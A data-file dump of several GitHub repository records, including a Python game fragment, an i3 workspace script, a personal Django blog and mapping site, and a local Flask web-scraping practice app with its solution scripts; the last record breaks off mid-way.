(player_type_input=='T1'):\r\n print(t1.type)\r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\n elif (player_type_input=='T2'):\r\n print(t2.type) \r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\nelif(player_input=='Counter Terrorist'):\r\n if (player_type_input=='CT1'):\r\n print(ct1.type)\r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) \r\n \r\n elif (player_type_input=='CT2'):\r\n print(ct2.type) \r\n \r\n if(gun_input=='Pistol'):\r\n if (gun_type_input=='Flare Gun'):\r\n print(flare_gun.type)\r\n elif (gun_type_input=='Deagle'):\r\n print(deagle.type) \r\n elif (gun_type_input=='Skorpion'):\r\n print(skorpion.type) \r\n elif (gun_input=='Rifle'): \r\n if (gun_type_input=='Assault Rifle'):\r\n print(assault_rifle.type)\r\n if (gun_type_input=='Sniper'):\r\n print(sniper.type) \r\n if (gun_type_input=='Shotgun'):\r\n print(shotgun.type)\r\n if (gun_type_input=='Machinegun'):\r\n print(machinegun.type) 
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
thomaskey/i3workspace | https://github.com/thomaskey/i3workspace | b391c7c9a2f9e0d5cdd9210fecc5ec4d7f98d332 | 905a2670bf415fd3cf80f17a5c6bd806786c5032 | 4cf52e0bc5c2f01ef3afdfee7b2ecddb70112c9d | refs/heads/master | 2020-09-23T22:44:01.472574 | 2016-08-29T17:28:28 | 2016-08-29T17:28:28 | 65,956,797 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6108325123786926,
"alphanum_fraction": 0.6238716244697571,
"avg_line_length": 24.564102172851562,
"blob_id": "3cdcd9d4dae3b622dadcfaed7a01e8036cb4dd96",
"content_id": "e0dc55081f93fbe2545f4f0693519420f9bd2178",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 39,
"path": "/scripts/wmdev.py",
"repo_name": "thomaskey/i3workspace",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport i3ipc\nimport time\nimport os\nfrom argparse import ArgumentParser\n\ni3 = i3ipc.Connection()\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-d');\n args = parser.parse_args()\n path = args.d;\n if path is None:\n path = os.getcwd()\n \n do_cmd(\"split v\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"split v\")\n do_cmd(\"layout tabbed\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"focus up\")\n do_cmd(\"split v\")\n do_cmd(\"layout tabbed\")\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"exec i3-sensible-terminal -cd \" + path)\n do_cmd(\"focus left\")\n do_cmd(\"focus left\")\n\ndef do_cmd(command):\n #I am ignorant on how to do python async, so here is some shit code\n i3.command(command)\n time.sleep(.1)\n\nmain()\n"
}
] | 1 |
leelum1/mysite | https://github.com/leelum1/mysite | 1f0ee68285005fd1d2ee6dbc1ab8afa19827ef04 | 863f5ac058174ad010b0a70dd72f7277731160a1 | b6ebd32f844b414364944891acf3b13d6c365472 | refs/heads/master | 2023-02-01T13:23:03.177047 | 2020-12-18T03:19:36 | 2020-12-18T03:19:36 | 282,359,583 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7011191844940186,
"alphanum_fraction": 0.7109940648078918,
"avg_line_length": 33.522727966308594,
"blob_id": "ad8801428cdf22ff2a080d2c5b46ca8d71c272ff",
"content_id": "9c4670bc844105ea92c7306e0553f69cc4a38dbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1519,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 44,
"path": "/blog_app/models.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.db.models.signals import pre_save\nfrom django.urls import reverse\nfrom django.utils.text import slugify\nfrom markdownx.models import MarkdownxField\n\n# Create your models here.\nclass Post(models.Model):\n title = models.CharField(max_length=225, unique=True)\n slug = models.SlugField()\n keywords = models.CharField(max_length=125)\n is_private = models.BooleanField(default=False)\n is_published = models.BooleanField(default=False)\n cover = models.ImageField(upload_to='blog_images/', blank=True)\n cover_caption = models.CharField(max_length=512, blank=True)\n summary = models.CharField(max_length=512)\n text = MarkdownxField()\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = ['-date_updated']\n\n def get_absolute_url(self):\n return reverse('blog_app:detail', kwargs={'slug':self.slug})\n\n def __str__(self):\n return self.title\n\nclass BlogImage (models.Model):\n blog = models.ForeignKey(Post, on_delete = models.CASCADE)\n image = models.ImageField(upload_to='blog_images/')\n caption = models.CharField(max_length=512, blank=True)\n is_main = models.BooleanField(default=False)\n\n def __str__(self):\n return self.blog.title\n\n\ndef create_slug(sender, instance, *args, **kwargs):\n if instance.title and not instance.slug:\n instance.slug = slugify(instance.title)\n\npre_save.connect(create_slug, sender=Post)\n"
},
{
"alpha_fraction": 0.6829113960266113,
"alphanum_fraction": 0.6854430437088013,
"avg_line_length": 33.34782791137695,
"blob_id": "4c8e7d73ab60d27704840a3ac1c9af43ad0e17b9",
"content_id": "a9592f0a94b24d4b0378753e3106f3c30afbfd7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1580,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 46,
"path": "/blog_app/views.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.urls import reverse, reverse_lazy\nfrom .models import Post, BlogImage\nfrom .forms import PostForm\n\n# Create your views here.\nclass PostListView(ListView):\n model = Post\n template_name = 'blog_app/blog_list.html'\n context_object_name = 'posts'\n paginate_by = 10\n\n def get_queryset(self):\n queryset = Post.objects.filter(is_private=False).order_by('-date_updated')\n return queryset\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog_app/blog_detail.html'\n context_object_name = 'post'\n\n def get_context_data(self, **kwargs):\n ctx = super(PostDetailView, self).get_context_data(**kwargs)\n ctx['images'] = BlogImage.objects.filter(blog=self.get_object()).filter(is_main=False)\n ctx['posts'] = Post.objects.all().exclude(id=self.get_object().id).order_by('date_updated')[:5][::-1]\n return ctx\n\nclass PostCreateView(CreateView):\n model = Post\n form_class = PostForm\n template_name = 'blog_app/blog_form.html'\n\nclass PostUpdateView(UpdateView):\n model = Post\n form_class = PostForm\n template_name = 'blog_app/blog_form.html'\n\n def get_context_data(self, **kwargs):\n ctx = super(PostUpdateView, self).get_context_data(**kwargs)\n ctx['images'] = BlogImage.objects.filter(blog=self.get_object())\n return ctx\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'blog_app/blog_delete.html'\n success_url = reverse_lazy('blog_app:list')\n"
},
{
"alpha_fraction": 0.6052922010421753,
"alphanum_fraction": 0.6119073629379272,
"avg_line_length": 21.674999237060547,
"blob_id": "ae7f932519df6b22e86b9fc8b0c331bdc8269ff2",
"content_id": "feac53b678513d573d310a06414e2d3edc17fb4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 40,
"path": "/sitemaps.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.contrib.sitemaps import Sitemap\nfrom django.urls import reverse\nfrom blog_app.models import Post\nfrom hike_app.models import Hike\n\nclass StaticViewSitemap(Sitemap):\n priority = 0.5\n changefreq = 'monthly'\n\n def items(self):\n return ['index',\n 'legal',\n 'contact',\n 'blog_app:list',\n 'watershed_app:map']\n\n def location(self, item):\n return reverse(item)\n\n\nclass BlogSitemap(Sitemap):\n changefreq = \"weekly\"\n priority = 0.5\n\n def items(self):\n return Post.objects.all()\n\n def location(self, item):\n return reverse('blog_app:detail', args=[str(item.slug)])\n\n\nclass HikeSitemap(Sitemap):\n changefreq = \"monthly\"\n priority = 0.5\n\n def items(self):\n return Hike.objects.all()\n\n def location(self, item):\n return reverse('hike_app:detail', args=[str(item.slug)])\n"
},
{
"alpha_fraction": 0.7521186470985413,
"alphanum_fraction": 0.7521186470985413,
"avg_line_length": 32.71428680419922,
"blob_id": "a5fb520a8aa415c1c2bf414a7bf8da550315c87f",
"content_id": "583c64d55ac616cc7db49d3d6cd0b383e7fea162",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 14,
"path": "/blog_app/admin.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom markdownx.admin import MarkdownxModelAdmin\nfrom .models import Post, BlogImage\n\n# Register your models here.\nclass PostAdmin(MarkdownxModelAdmin):\n list_display = ['title', 'date_created', 'is_published', 'is_private']\n prepopulated_fields = {\"slug\": (\"title\",)}\n\nclass BlogImageAdmin(admin.ModelAdmin):\n list_display = ['blog', 'caption']\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(BlogImage, BlogImageAdmin)\n"
},
{
"alpha_fraction": 0.703290581703186,
"alphanum_fraction": 0.7077523469924927,
"avg_line_length": 42.73170852661133,
"blob_id": "09cd9ad65661a96993d0a836e87267353ba5dd8c",
"content_id": "ce39325266a306b7833ee9f5e11674e63881cdf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1793,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 41,
"path": "/mysite/urls.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.views.generic.base import TemplateView\nfrom . import views\n\nurlpatterns = [\n path('cookies/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')),\n path('robots.txt', TemplateView.as_view(template_name=\"robots.txt\", content_type=\"text/plain\"),),\n path('', views.IndexTemplateView.as_view(), name='index'),\n path('legal/', views.LegalTemplateView.as_view(), name='legal'),\n path('contact/', views.ContactFormView.as_view(), name='contact'),\n path('Trinidad-Hiking/', views.HikingTemplateView.as_view(), name='hiking'),\n path('Trinidad-Tobago-Watersheds/', views.WatershedMapTemplateView.as_view(), name='watersheds'),\n path('blog/', include('blog_app.urls')),\n path('markdownx/', include('markdownx.urls')),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns += [\n path('__debug__/', include(debug_toolbar.urls)),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.6894736886024475,
"alphanum_fraction": 0.7210526466369629,
"avg_line_length": 18,
"blob_id": "89f700c60847b1872ebe9aceab99d9c7626c8ce3",
"content_id": "80f70486409c72c2bfb067e8fe80ba4b2b11b679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/README.md",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "# My Website\n\n### Backend\nPython 3.6, Geodjango, GDAL, PostgreSQL, PostGIS\n\n### Front\nBootstrap, Leaflet, Mapbox, hopefully some D3 soon\n\n### Deploy\nAWS Elastic Beanstalk, RDS, S3, Route 53\n"
},
{
"alpha_fraction": 0.6600639224052429,
"alphanum_fraction": 0.6690095663070679,
"avg_line_length": 36.261905670166016,
"blob_id": "ffce573ad89c2511cdc6c0c07fb08848cbf9ca97",
"content_id": "e79af022603c151424444a98bf364f0e81aea82b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 42,
"path": "/mysite/views.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.views.generic import TemplateView, FormView\nfrom django.http import JsonResponse\nfrom django.core.mail import send_mail\nfrom blog_app.models import Post\nfrom .forms import ContactForm\n\nclass IndexTemplateView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n ctx = super(IndexTemplateView, self).get_context_data(**kwargs)\n ctx['private_posts'] = Post.objects.all()[:6]\n ctx['public_posts'] = Post.objects.filter(is_private=False)[:6]\n return ctx\n\nclass LegalTemplateView(TemplateView):\n template_name = 'legal.html'\n\nclass ContactFormView(FormView):\n form_class = ContactForm\n template_name = 'contact.html'\n\n def form_valid(self, form):\n \"\"\"If the form is valid, save the associated model.\"\"\"\n if self.request.is_ajax():\n name=form.cleaned_data['name']\n email=form.cleaned_data['email']\n message=form.cleaned_data['message']\n send_mail('Website Query from ' + name, message + \"\\n\\nReply to \" + name + \" at \" + email, '[email protected]', ['[email protected]',],\n fail_silently=False,\n )\n return JsonResponse({\"message\": \"Your message has bean sent. Returning to the home page now...\"})\n return super().form_valid(form)\n\nclass WatershedMapTemplateView(TemplateView):\n template_name = 'mapping/watershed_map.html'\n\nclass HikingTemplateView(TemplateView):\n template_name = 'mapping/hike_map.html'\n\ndef google_verify(request):\n return render(request, 'googlea70085b6066e71d7.html')\n"
},
{
"alpha_fraction": 0.6566015481948853,
"alphanum_fraction": 0.6802842020988464,
"avg_line_length": 30.27777862548828,
"blob_id": "b7d11cf189c205ee49b53a661d17ca258d83e5cc",
"content_id": "a3fba670b684704250e86af33925fb419192bc76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1689,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 54,
"path": "/mysite/settings/prod.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from .base import *\n\nDEBUG = False\n\nALLOWED_HOSTS = [\n # 'mysite-env.eba-ssxmmhfu.us-east-1.elasticbeanstalk.com',\n 'www.kevanleelum.com',\n # '172.31.20.208',\n ]\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = os.environ['EMAIL_HOST']\nEMAIL_PORT = os.environ['EMAIL_PORT']\nEMAIL_HOST_USER = os.environ['EMAIL_HOST_USER']\nEMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']\nEMAIL_USE_TLS = True\nEMAIL_TIMEOUT = 60\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n}\n\nAWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n}\n\nAWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\nAWS_S3_REGION_NAME = os.environ['AWS_S3_REGION_NAME']\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\nAWS_DEFAULT_ACL = None\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nSTATIC_LOCATION = 'static'\nSTATIC_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, STATIC_LOCATION)\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\n\nPUBLIC_MEDIA_LOCATION = 'media'\nMEDIA_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, PUBLIC_MEDIA_LOCATION)\nDEFAULT_FILE_STORAGE = 'custom_storages.PublicMediaStorage'\n"
}
] | 8 |
rush175/scrape.localhost | https://github.com/rush175/scrape.localhost | cdf8edfffe105201ab8d177e1cbf9ae0e94bf2b7 | 4a60fb3fed634741e1c4f372ce195a86731b4d14 | 1307a0645e102e98a208d791174f2485aa7853a4 | refs/heads/master | 2022-04-14T09:45:44.779274 | 2020-04-10T21:00:15 | 2020-04-10T21:00:15 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6742976307868958,
"alphanum_fraction": 0.6826222538948059,
"avg_line_length": 21.34883689880371,
"blob_id": "04c5c84b641560799646f9a51c09ef75d8aa90c8",
"content_id": "6e367c1a776649d8e70b270cef01e7c25b8b446c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 43,
"path": "/app.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template\nfrom flask_simplelogin import SimpleLogin, login_required\nimport config\n\napp = Flask(__name__, template_folder=\"templates\")\napp.config[\"SECRET_KEY\"] = config.secret\nSimpleLogin(app, login_checker=config.login_checker)\n\[email protected]('/')\ndef index():\n return render_template(\"index.html\")\n\[email protected]('/page')\ndef creatures():\n return render_template(\"page.html\")\n\[email protected]('/table')\ndef table():\n return render_template(\"table.html\")\n\[email protected]('/protected')\n@login_required()\ndef protected():\n return render_template(\"protected.html\")\n\[email protected]('/ocr')\ndef ocr():\n return render_template(\"ocr.html\")\n\[email protected]('/media')\ndef media():\n return render_template(\"media.html\")\n\[email protected]('/login')\ndef login():\n return render_template(\"login.html\")\n\[email protected]('/mvp')\ndef mvp():\n return render_template(\"mvp.html\")\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n"
},
{
"alpha_fraction": 0.5794872045516968,
"alphanum_fraction": 0.5794872045516968,
"avg_line_length": 20.66666603088379,
"blob_id": "ccba17c9dc69a09ac320f0311df40e73e135ed0c",
"content_id": "fd9c228e79eeb4c2d2fb9b97a58ad82514f5398c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 390,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 18,
"path": "/config.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "# Hi GitHub :)\n\nsecret = \"super-secret-secret\"\n\nusers = {\n \"admin\": {\"password\": \"admin\"},\n \"oreilly\": {\"password\": \"letmescrape\"},\n \"max\": {\"password\": \"i-like-gazpacho\"},\n}\n\n\ndef login_checker(user):\n user_data = users.get(user[\"username\"])\n if not user_data:\n return False\n elif user_data.get(\"password\") == user[\"password\"]:\n return True\n return False\n"
},
{
"alpha_fraction": 0.6709204316139221,
"alphanum_fraction": 0.6714634895324707,
"avg_line_length": 82.70454406738281,
"blob_id": "b79d178e6e4ed9fd99310852bee9f92af589d24c",
"content_id": "c39dc222a55f51c1435dbfba0e463bc440b8e33e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3683,
"license_type": "permissive",
"max_line_length": 281,
"num_lines": 44,
"path": "/templates/page.html",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block content %}\n<article>\n <aside>\n <h2>Page Demo</h2>\n </aside>\n</article>\n<br/>\n<div>\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Centaur\" title=\"Centaur\">Centaur</a>, a creature with a head and torso of a human and the body of a horse.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Chimera_(mythology)\" title=\"Chimera (mythology)\">Chimera</a>, a fire-breathing, three-headed monster with one head of a lion, one of a snake, and another of a goat, lion claws in front and goat legs behind, and a long snake tail.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Gorgons\" class=\"mw-redirect\" title=\"Gorgons\">Gorgons</a>, female monsters depicted as having snakes on their head instead of hair, and sometimes described as having tusks, wings and brazen claws.\n <ul><li><a href=\"https://en.wikipedia.org/wiki/Euryale_(Gorgon)\" title=\"Euryale (Gorgon)\">Euryale</a>, whose scream could kill.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Medusa\" title=\"Medusa\">Medusa</a>, whose gaze could turn anyone to stone.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Stheno\" title=\"Stheno\">Stheno</a>, most murderous of the sisters.</li></ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Griffin\" title=\"Griffin\">Griffin</a> or Gryphon or Gryps or Grypes, a creature that combines the body of a lion and the head and wings of an eagle.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Harpies\" class=\"mw-redirect\" title=\"Harpies\">Harpies</a>, creature with torso, head and arms of a woman, and talons, tail and wings (mixed with the arms) of a bird.\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Aello\" title=\"Aello\">Aello</a></li>\n <li><a href=\"https://en.wikipedia.org/wiki/Celaeno\" title=\"Celaeno\">Celaeno</a></li>\n <li><a href=\"https://en.wikipedia.org/wiki/Ocypete\" title=\"Ocypete\">Ocypete</a></li>\n </ul>\n </li>\n <li>Hydras\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Lernaean_Hydra\" title=\"Lernaean Hydra\">Lernaean Hydra</a>, also known as King Hydra, a many-headed, serpent-like creature that guarded an Underworld entrance beneath Lake <a href=\"https://en.wikipedia.org/wiki/Lerna\"\n title=\"Lerna\">Lerna</a>. 
It was destroyed by <a href=\"https://en.wikipedia.org/wiki/Heracles\" title=\"Heracles\">Heracles</a>, in his second <a href=\"https://en.wikipedia.org/wiki/Labours_of_Heracles\" class=\"mw-redirect\" title=\"Labours of Heracles\">Labour</a>.\n Son of Typhon and Echidna.</li>\n </ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Minotaur\" title=\"Minotaur\">Minotaur</a>, a monster with the head of a bull and the body of a man; slain by <a href=\"https://en.wikipedia.org/wiki/Theseus\" title=\"Theseus\">Theseus</a>.</li>\n <li>Multi-headed Dogs\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Cerberus\" title=\"Cerberus\">Cerberus</a>, the three-headed giant hound that guarded the gates of the Underworld.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Orthrus\" title=\"Orthrus\">Orthrus</a>, a two-headed dog, brother of Cerberus, slain by Heracles.</li>\n </ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Phoenix_(mythology)\" title=\"Phoenix (mythology)\">Phoenix</a>, a golden-red fire bird of which only one could live at a time, but would burst into flames to rebirth from ashes as a new phoenix.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Siren_(mythology)\" title=\"Siren (mythology)\">Sirens</a>, bird-like women whose irresistible song lured sailors to their deaths.</li>\n </ul>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6495388746261597,
"alphanum_fraction": 0.6587615013122559,
"avg_line_length": 19.513513565063477,
"blob_id": "0a4308e955771f9e488ef44289511c1d71130fe2",
"content_id": "dcc63b09882a2cafad493318f5f09b90fd04e19d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 37,
"path": "/solutions/05_media.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\nfrom shutil import rmtree as delete\nfrom urllib.request import urlretrieve as download\nfrom gazpacho import get, Soup\n\ndir = 'media'\nPath(dir).mkdir(exist_ok=True)\n\nbase = 'http://localhost:5000/'\nurl = base + '/media'\nhtml = get(url)\nsoup = Soup(html)\n\n# download images\n\nimgs = soup.find('img')\nsrcs = [i.attrs['src'] for i in imgs]\n\nfor src in srcs:\n name = src.split('/')[-1]\n download(base + src, f'{dir}/{name}')\n\n# download audio\n\naudio = soup.find('audio').find('source').attrs['src']\nname = audio.split('/')[-1]\ndownload(base + audio, f\"{dir}/{name}\")\n\n# download video\n\nvideo = soup.find('video').find('source').attrs['src']\nname = video.split('/')[-1]\ndownload(base + video, f\"{dir}/{name}\")\n\n# clean up\n\ndelete(dir)\n"
},
{
"alpha_fraction": 0.7579092383384705,
"alphanum_fraction": 0.763411283493042,
"avg_line_length": 22.45161247253418,
"blob_id": "5cc8a14a1f7512922834edd7468bd57e2caf64cb",
"content_id": "4c6f95bdfb127cc16c372de0f6f17b9ba821d809",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 31,
"path": "/solutions/03_protected.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from gazpacho import Soup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\n\nurl = \"http://localhost:5000/protected\"\n\noptions = Options()\noptions.headless = True\nbrowser = Firefox(executable_path=\"/usr/local/bin/geckodriver\", options=options)\nbrowser.get(url)\n\n# username\nusername = browser.find_element_by_id(\"username\")\nusername.clear()\nusername.send_keys(\"admin\")\n\n# password\npassword = browser.find_element_by_name(\"password\")\npassword.clear()\npassword.send_keys(\"admin\")\n\n# submit\nbrowser.find_element_by_xpath(\"/html/body/main/form/button\").click()\n\n# refetch\nbrowser.get(url)\n\n# gazpacho\nhtml = browser.page_source\nsoup = Soup(html)\nsoup.find(\"blockquote\").remove_tags()\n"
},
{
"alpha_fraction": 0.717391312122345,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 13.076923370361328,
"blob_id": "76a167aefceba456e972c5c6abb66c5764478d38",
"content_id": "93deee1b7dcd0748ba7c7d2e0b87e20f23dd9801",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 187,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 13,
"path": "/README.md",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "### 🐉 scrape.localhost\n\nFlask App for Web Scraping Locally\n\n**Setup**\n\n```\npython -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\npython app.py\ndeactivate\n```\n\n"
},
{
"alpha_fraction": 0.6050724387168884,
"alphanum_fraction": 0.6213768124580383,
"avg_line_length": 18.034482955932617,
"blob_id": "92874eb99dcb66e38ad64f304a307415d7695efb",
"content_id": "94c0e1067b3cd622714a2b07294efc38a896812b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 29,
"path": "/solutions/02_table.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
